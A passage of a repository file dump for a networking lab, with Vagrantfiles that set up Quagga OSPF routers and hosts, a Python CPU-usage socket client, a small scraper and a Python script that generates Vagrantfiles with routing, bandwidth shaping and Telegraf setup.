192.168.1.254/24\nexit\ninterface eth2\nip address 192.168.100.1/24\nexit\ninterface eth3\nip address 192.168.101.2/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"routerjack is ready to Use\"\nSHELL\n# routerjack.vm.provision \"shell\", path: \"common.sh\"\nrouterjack.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"routersteve\" do |routersteve|\nroutersteve.vm.box = \"bento/ubuntu-16.04\"\nroutersteve.vm.hostname = \"routersteve\"\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: false\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-3\", auto_config: false\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\nroutersteve.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga routersteve start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i 
s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.2.0/24 area 0.0.0.0\nnetwork 192.168.100.0/24 area 0.0.0.0\nnetwork 192.168.102.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 192.168.2.254/24\nexit\ninterface eth2\nip address 192.168.100.2/24\nexit\ninterface eth3\nip address 192.168.102.2/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"routersteve is ready to Use\"\nSHELL\n# routersteve.vm.provision \"shell\", path: \"common.sh\"\nroutersteve.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"ruoterjhon\" do |ruoterjhon|\nruoterjhon.vm.box = \"bento/ubuntu-16.04\"\nruoterjhon.vm.hostname = \"ruoterjhon\"\nruoterjhon.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga ruoterjhon start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.3.0/24 area 0.0.0.0\nnetwork 192.168.101.0/24 area 0.0.0.0\nnetwork 192.168.102.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 192.168.3.254/24\nexit\ninterface eth2\nip address 192.168.101.1/24\nexit\ninterface eth3\nip address 192.168.102.1/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"ruoterjhon is ready to Use\"\nSHELL\n# ruoterjhon.vm.provision \"shell\", path: \"common.sh\"\nruoterjhon.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostbanana\" do |hostbanana|\nhostbanana.vm.box = \"bento/ubuntu-16.04\"\nhostbanana.vm.hostname = \"hostbanana\"\nhostbanana.vm.network \"private_network\", ip: \"192.168.1.1\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\nhostbanana.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostbanana\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254 dev eth1\necho \"Configuration END\"\necho \"hostbanana is ready to Use\"\nSHELL\nhostbanana.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostmela\" do |hostmela|\nhostmela.vm.box = \"bento/ubuntu-16.04\"\nhostmela.vm.hostname = \"hostmela\"\nhostmela.vm.network \"private_network\", ip: \"192.168.2.1\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\nhostmela.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostmela\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.254 dev eth1\necho 
\"Configuration END\"\necho \"hostmela is ready to Use\"\nSHELL\nhostmela.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostpera\" do |hostpera|\nhostpera.vm.box = \"bento/ubuntu-16.04\"\nhostpera.vm.hostname = \"hostpera\"\nhostpera.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostpera\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.254 dev eth1\necho \"Configuration END\"\necho \"hostpera is ready to Use\"\nSHELL\nhostpera.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nend\n"
},
{
"alpha_fraction": 0.6499176025390625,
"alphanum_fraction": 0.6771004796028137,
"avg_line_length": 24.808509826660156,
"blob_id": "3cc49d4da01aaa59a84fbfd1e7aef3a51528964b",
"content_id": "6010b70eb2926b4a0559ea67c17ebd1ae3fe09e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1214,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 47,
"path": "/Server and Client/client.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket\n\nimport psutil #this import was added by luca\nimport time\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n#SERVER = \"192.168.53.133\"\nSERVER = \"127.0.1.1\" #Luca: \"i added this line to make it work on my pc, commenting the one above\"\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n send_length += b' ' * (HEADER - len(send_length))\n client.send(send_length)\n client.send(message)\n print(client.recv(2048).decode(FORMAT))\n\n#this function return the percentage of RAM in use by the machine\ndef Ram_data_perc():\n return (int(psutil.virtual_memory().available * 100 / psutil.virtual_memory().total))\n\n#this function return the percentage of CPU in use by the machine\ndef Cpu_data_perc():\n return (int(psutil.cpu_percent())) \n\n\ntry:\n while(1):\n #send(str(Ram_data_perc()))\n send(str(Cpu_data_perc()))\n time.sleep(1)\nexcept:\n send(DISCONNECT_MESSAGE)\n\n#send(str(Ram_data_perc()))\n#input()\n#send(str(Cpu_data_perc()))\n#input()\n#send(\"Hello uzair!\")\n\n"
},
{
"alpha_fraction": 0.6069246530532837,
"alphanum_fraction": 0.6252545714378357,
"avg_line_length": 31.733333587646484,
"blob_id": "6cc880420e46ed49621c6cbabe1daffad4aec8d2",
"content_id": "4f7697fb79c0188652a61f6e720a52f20a14564a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 15,
"path": "/fromHTMLtoVagrant/OldScripts/vagrantDB.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import urllib3\nfrom bs4 import BeautifulSoup\n\ndef retrieve_versionsOS(os):\n url = 'https://app.vagrantup.com/' + os\n req = urllib3.PoolManager()\n res = req.request('GET', url)\n soup = BeautifulSoup(res.data, 'html.parser')\n boxes = soup.findAll('div', {'class': 'col-md-6'})\n versions = []\n for box in boxes:\n version = box.text.split()[0]\n description = box.text.rsplit('\\n', 3)[2][12:]\n versions.append((version, description))\n return versions\n"
},
{
"alpha_fraction": 0.5988142490386963,
"alphanum_fraction": 0.6324110627174377,
"avg_line_length": 25.63157844543457,
"blob_id": "5e47cd299de8e7c57ae74b9090463256c31dc7b7",
"content_id": "f37b7dab1ed207cbc67bb767f5d7fc0fce7cf3d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 506,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 19,
"path": "/AllVagrantFiles/Web_Server_With_Docker_and_Port_Forwarding/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "## to access webserver try this in your webbrowser : (http://localhost:8081/) you will see the webpage.\n\n## or you can configure one by yourself\n\n\n\n # -*- mode: ruby -*-\n# vi: set ft=ruby :\n \n Vagrant.configure(\"2\") do |config|\n config.vm.box = \"ubuntu/xenial64\"\n config.vm.network \"forwarded_port\", guest: 80, host: 8081\n config.vm.provision \"docker\" do |doc|\n\t doc.pull_images \"nginx\"\n doc.pull_images \"mysql\"\n\t\t doc.run \"mysql\"\n\t\t doc.run \"nginx\", args: \"-p 80:80\"\n end\n end\n"
},
{
"alpha_fraction": 0.5871710777282715,
"alphanum_fraction": 0.6146746873855591,
"avg_line_length": 44.21900939941406,
"blob_id": "cc84e9a16b062ec92e552a659b6aaf9c6eb7c5d8",
"content_id": "74b578b581fd2e2c16ca3637bb460e0696331af5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21888,
"license_type": "permissive",
"max_line_length": 191,
"num_lines": 484,
"path": "/fromHTMLtoVagrant/VagrantTopology3S2H.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('config.vm.box_check_update = true\\n')\n f.write('config.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\\n')\n f.write('vb.cpus = 1\\n')\n f.write('end\\n')\n\n#this function writes a server in vagrant file\ndef writeServer(f, Server, edges, network):\n \n Id = Server[\"id\"]\n Name = Server[\"label\"]\n Os = Server[\"vm_image\"]\n Ram = Server[\"ram\"]\n N_Cpus = Server[\"n_cpus\"]\n CustomScript = Server[\"custom_script\"]\n\n\n Ip1 = Server[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Server[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Server[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Server[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n if(Id != 6):\n Ip2 = Server[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Server[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Server[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Server[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n\n if Id == 1: \n tag = \"1\"\n if Id == 2 or Id == 6: \n tag = \"2\" \n\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer1_1 = ipcalc.Network(IpServer1_1)\n IpNetServer1_1 = str(NetworkServer1_1.network()) \n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network()) \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = 
str(Network8.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network()) \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network()) \n\n GatewayServer2_2 = network[1][\"network_interfaces\"][1][\"ip_address\"]\n GatewayServer2_2 = GatewayServer2_2.split(\"/\")[0]\n \n GatewayServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n GatewayServer1_2 = GatewayServer1_2.split(\"/\")[0]\n\n GatewaySwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n GatewaySwitch_2 = GatewaySwitch_2.split(\"/\")[0]\n\n GatewaySwitch_3 = network[2][\"network_interfaces\"][2][\"ip_address\"]\n GatewaySwitch_3 = GatewaySwitch_3.split(\"/\")[0]\n\n \n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n if Id != 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id == 1: \n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + GatewayServer2_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch_3 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch_3 + \" dev \" + Interface1 + \"\\n\")\n if Id == 2: \n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n if Id == 6:\n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 + \" netmask \" + NetmaskServer1_2 + \" gw 
\" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if(Id != 6):\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges, network):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n CustomScript = Host[\"custom_script\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer1_1 = ipcalc.Network(IpServer1_1)\n IpNetServer1_1 = str(NetworkServer1_1.network()) \n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpServer1_2 = 
network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network()) \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network()) \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n\n if Id == 4:\n Gateway = IpSwitch_1.split(\"/\")[0]\n\n if Id == 5:\n Gateway = IpSwitch_2.split(\"/\")[0]\n\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n\n #f.write(\"#.vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n #f.write(\"#echo \\\"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on \" + Name + \"\\\"\\n\")\n #f.write(\"#sudo apt-get update\\n\")\n #f.write(\"#sudo apt-get install -y lynx\\n\")\n #f.write(\"#echo \\\"Lynx-Browser is installed\\\"\\n\")\n #f.write(\"#SHELL\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 + \" netmask \" + NetmaskServer1_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n\n if Id == 4: \n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 5:\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget 
https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custom script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function writes a new Switch in the Vagrantfile\ndef writeSwitch(f, Switch, edges, network):\n\n #extrapolate each attribute from the touples\n Id = Switch[\"id\"]\n Name = Switch[\"label\"]\n Ram = Switch[\"ram\"]\n N_Cpus = Switch[\"n_cpus\"]\n Os = Switch[\"vm_image\"]\n CustomScript = Switch[\"custom_script\"]\n\n IpA = Switch[\"network_interfaces\"][0][\"ip_address\"]\n NetmaskA = Switch[\"network_interfaces\"][0][\"netmask\"]\n InterfaceA = Switch[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReferenceA = Switch[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidthA = 0\n DownlinkBandwidthA = 0\n for edge in edges:\n if EdgeReferenceA[0] == edge[\"from\"] and EdgeReferenceA[1] == edge[\"to\"]:\n UplinkBandwidthA = edge[\"bandwidth_up\"]\n DownlinkBandwidthA = edge[\"bandwidth_down\"]\n\n IpB = Switch[\"network_interfaces\"][1][\"ip_address\"]\n NetmaskB = Switch[\"network_interfaces\"][1][\"netmask\"]\n InterfaceB = Switch[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReferenceB = Switch[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidthB = 0\n DownlinkBandwidthB = 0\n for edge in edges:\n if EdgeReferenceB[0] == edge[\"from\"] and EdgeReferenceB[1] == edge[\"to\"]:\n UplinkBandwidthB = edge[\"bandwidth_up\"]\n DownlinkBandwidthB = edge[\"bandwidth_down\"]\n\n IpSW = Switch[\"network_interfaces\"][2][\"ip_address\"]\n NetmaskSW = Switch[\"network_interfaces\"][2][\"netmask\"]\n InterfaceSW = Switch[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReferenceSW = Switch[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidthSW = 0\n DownlinkBandwidthSW = 0\n for edge in edges:\n if EdgeReferenceSW[0] == edge[\"from\"] and EdgeReferenceSW[1] == edge[\"to\"]:\n UplinkBandwidthSW = edge[\"bandwidth_up\"]\n DownlinkBandwidthSW = 